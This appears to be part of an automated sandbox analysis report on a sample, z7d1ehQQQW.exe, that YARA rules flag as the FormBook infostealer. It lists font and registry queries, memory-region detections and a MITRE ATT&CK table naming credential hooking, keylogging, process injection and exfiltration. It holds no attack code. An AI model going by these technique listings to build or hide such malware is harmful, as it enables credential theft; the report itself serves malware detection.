            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
